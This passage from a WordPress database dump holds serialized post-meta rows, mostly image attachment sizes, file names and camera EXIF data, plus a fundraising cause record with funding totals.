{s:4:\"file\";s:21:\"IMG_0852-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"large-orig\";a:4:{s:4:\"file\";s:21:\"IMG_0852-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"post-thumbnail-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0852-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"grid-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0852-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"list-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0852-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"thumb-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0852-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"shop_thumbnail-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0852-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"shop_catalog-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0852-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"shop_single-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0852-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(3579,884,'_wp_attachment_backup_sizes','a:12:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:3456;s:6:\"height\";i:5184;s:4:\"file\";s:12:\"IMG_0849.jpg\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0849-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0849-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"medium_large-orig\";a:4:{s:4:\"file\";s:21:\"IMG_0849-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"large-orig\";a:4:{s:4:\"file\";s:21:\"IMG_0849-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"post-thumbnail-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0849-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"grid-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0849-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"list-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0849-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"thumb-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0849-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"shop_thumbnail-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0849-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"shop_catalog-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0849-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"shop_single-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0849-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(124,59,'_edit_last','1'),(125,59,'ts_template','a:0:{}'),(126,59,'cause','a:7:{s:10:\"date-start\";s:0:\"\";s:8:\"date-end\";i:1491004800;s:9:\"paypal-id\";s:19:\"paypal@zphiblgz.org\";s:13:\"currency-code\";s:1:\"$\";s:15:\"funded-till-now\";s:4:\"1000\";s:5:\"total\";s:5:\"4,000\";s:6:\"custom\";s:0:\"\";}'),(128,59,'_touchsize_likes','0'),(2252,59,'_um_custom_access_settings','0'),(3510,879,'_wp_attachment_backup_sizes','a:24:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:5184;s:6:\"height\";i:3456;s:4:\"file\";s:12:\"IMG_0842.jpg\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0842-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0842-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"medium_large-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0842-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"large-orig\";a:4:{s:4:\"file\";s:21:\"IMG_0842-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"post-thumbnail-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0842-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"grid-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0842-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"list-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0842-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"thumb-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0842-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"shop_thumbnail-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0842-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"shop_catalog-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0842-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"shop_single-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0842-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"full-1484269600518\";a:3:{s:5:\"width\";i:3456;s:6:\"height\";i:5184;s:4:\"file\";s:27:\"IMG_0842-e1484192100630.jpg\";}s:23:\"thumbnail-1484269600518\";a:4:{s:4:\"file\";s:35:\"IMG_0842-e1484192100630-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"medium-1484269600518\";a:4:{s:4:\"file\";s:35:\"IMG_0842-e1484192100630-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"medium_large-1484269600518\";a:4:{s:4:\"file\";s:36:\"IMG_0842-e1484192100630-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"large-1484269600518\";a:4:{s:4:\"file\";s:36:\"IMG_0842-e1484192100630-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"post-thumbnail-1484269600518\";a:4:{s:4:\"file\";s:35:\"IMG_0842-e1484192100630-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"grid-1484269600518\";a:4:{s:4:\"file\";s:35:\"IMG_0842-e1484192100630-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"list-1484269600518\";a:4:{s:4:\"file\";s:35:\"IMG_0842-e1484192100630-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"thumb-1484269600518\";a:4:{s:4:\"file\";s:35:\"IMG_0842-e1484192100630-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"shop_thumbnail-1484269600518\";a:4:{s:4:\"file\";s:35:\"IMG_0842-e1484192100630-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"shop_catalog-1484269600518\";a:4:{s:4:\"file\";s:35:\"IMG_0842-e1484192100630-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"shop_single-1484269600518\";a:4:{s:4:\"file\";s:35:\"IMG_0842-e1484192100630-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(3531,884,'_wp_attached_file','2017/01/IMG_0849-e1484269442570.jpg'),(3532,884,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3460;s:6:\"height\";i:3823;s:4:\"file\";s:35:\"2017/01/IMG_0849-e1484269442570.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"IMG_0849-e1484269442570-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"IMG_0849-e1484269442570-272x300.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"IMG_0849-e1484269442570-768x849.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:849;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"IMG_0849-e1484269442570-927x1024.jpg\";s:5:\"width\";i:927;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:35:\"IMG_0849-e1484269442570-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:35:\"IMG_0849-e1484269442570-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:35:\"IMG_0849-e1484269442570-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:35:\"IMG_0849-e1484269442570-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"IMG_0849-e1484269442570-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:35:\"IMG_0849-e1484269442570-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"IMG_0849-e1484269442570-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:19:\"Canon EOS REBEL T3i\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1476645002\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"43\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(5073,1293,'_wp_attached_file','2018/09/ExecutiveResize.png'),(5258,1323,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:504;s:6:\"height\";i:190;s:4:\"file\";s:25:\"2018/09/whitezetalogo.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"whitezetalogo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"whitezetalogo-300x113.png\";s:5:\"width\";i:300;s:6:\"height\";i:113;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:25:\"whitezetalogo-400x190.png\";s:5:\"width\";i:400;s:6:\"height\";i:190;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:25:\"whitezetalogo-450x190.png\";s:5:\"width\";i:450;s:6:\"height\";i:190;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:25:\"whitezetalogo-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5259,1324,'_wp_attached_file','2018/09/Donate.png'),(5260,1324,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:150;s:4:\"file\";s:18:\"2018/09/Donate.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"Donate-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:18:\"Donate-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5257,1323,'_wp_attached_file','2018/09/whitezetalogo.png'),(3497,728,'_wp_attachment_backup_sizes','a:10:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:700;s:6:\"height\";i:525;s:4:\"file\";s:12:\"QGardner.jpg\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:20:\"QGardner-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:20:\"QGardner-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"post-thumbnail-orig\";a:4:{s:4:\"file\";s:20:\"QGardner-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"grid-orig\";a:4:{s:4:\"file\";s:20:\"QGardner-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"list-orig\";a:4:{s:4:\"file\";s:20:\"QGardner-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"thumb-orig\";a:4:{s:4:\"file\";s:20:\"QGardner-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"shop_thumbnail-orig\";a:4:{s:4:\"file\";s:20:\"QGardner-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"shop_catalog-orig\";a:4:{s:4:\"file\";s:20:\"QGardner-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"shop_single-orig\";a:4:{s:4:\"file\";s:20:\"QGardner-600x525.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:525;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(3968,991,'__wpdm_package_size_b','91041'),(3445,864,'_wp_attached_file','2017/01/JontueSumler.jpg'),(3446,864,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:100;s:6:\"height\";i:100;s:4:\"file\";s:24:\"2017/01/JontueSumler.jpg\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3465,869,'_wp_attached_file','2017/01/IMG_0852-e1484268648791.jpg'),(3466,869,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3077;s:6:\"height\";i:3763;s:4:\"file\";s:35:\"2017/01/IMG_0852-e1484268648791.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"IMG_0852-e1484268648791-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"IMG_0852-e1484268648791-245x300.jpg\";s:5:\"width\";i:245;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"IMG_0852-e1484268648791-768x939.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:939;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"IMG_0852-e1484268648791-837x1024.jpg\";s:5:\"width\";i:837;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:35:\"IMG_0852-e1484268648791-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:35:\"IMG_0852-e1484268648791-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:35:\"IMG_0852-e1484268648791-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:35:\"IMG_0852-e1484268648791-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"IMG_0852-e1484268648791-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:35:\"IMG_0852-e1484268648791-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"IMG_0852-e1484268648791-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:19:\"Canon EOS REBEL T3i\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1476645012\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"55\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3472,871,'_wp_attached_file','2017/01/IMG_0839-e1484268523931.jpg'),(3473,871,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3460;s:6:\"height\";i:4263;s:4:\"file\";s:35:\"2017/01/IMG_0839-e1484268523931.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"IMG_0839-e1484268523931-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"IMG_0839-e1484268523931-243x300.jpg\";s:5:\"width\";i:243;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"IMG_0839-e1484268523931-768x946.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:946;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"IMG_0839-e1484268523931-831x1024.jpg\";s:5:\"width\";i:831;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:35:\"IMG_0839-e1484268523931-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:35:\"IMG_0839-e1484268523931-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:35:\"IMG_0839-e1484268523931-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:35:\"IMG_0839-e1484268523931-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"IMG_0839-e1484268523931-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:35:\"IMG_0839-e1484268523931-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"IMG_0839-e1484268523931-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:19:\"Canon EOS REBEL T3i\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1476644953\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"37\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"8\";s:8:\"keywords\";a:0:{}}}'),(3474,871,'_wp_attachment_backup_sizes','a:24:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:5184;s:6:\"height\";i:3456;s:4:\"file\";s:12:\"IMG_0839.jpg\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0839-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0839-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"medium_large-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0839-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"large-orig\";a:4:{s:4:\"file\";s:21:\"IMG_0839-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"post-thumbnail-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0839-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"grid-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0839-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"list-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0839-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"thumb-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0839-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"shop_thumbnail-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0839-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"shop_catalog-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0839-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"shop_single-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0839-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"full-1484268523931\";a:3:{s:5:\"width\";i:3456;s:6:\"height\";i:5184;s:4:\"file\";s:27:\"IMG_0839-e1484190921258.jpg\";}s:23:\"thumbnail-1484268523931\";a:4:{s:4:\"file\";s:35:\"IMG_0839-e1484190921258-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"medium-1484268523931\";a:4:{s:4:\"file\";s:35:\"IMG_0839-e1484190921258-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"medium_large-1484268523931\";a:4:{s:4:\"file\";s:36:\"IMG_0839-e1484190921258-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"large-1484268523931\";a:4:{s:4:\"file\";s:36:\"IMG_0839-e1484190921258-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"post-thumbnail-1484268523931\";a:4:{s:4:\"file\";s:35:\"IMG_0839-e1484190921258-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"grid-1484268523931\";a:4:{s:4:\"file\";s:35:\"IMG_0839-e1484190921258-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"list-1484268523931\";a:4:{s:4:\"file\";s:35:\"IMG_0839-e1484190921258-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"thumb-1484268523931\";a:4:{s:4:\"file\";s:35:\"IMG_0839-e1484190921258-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"shop_thumbnail-14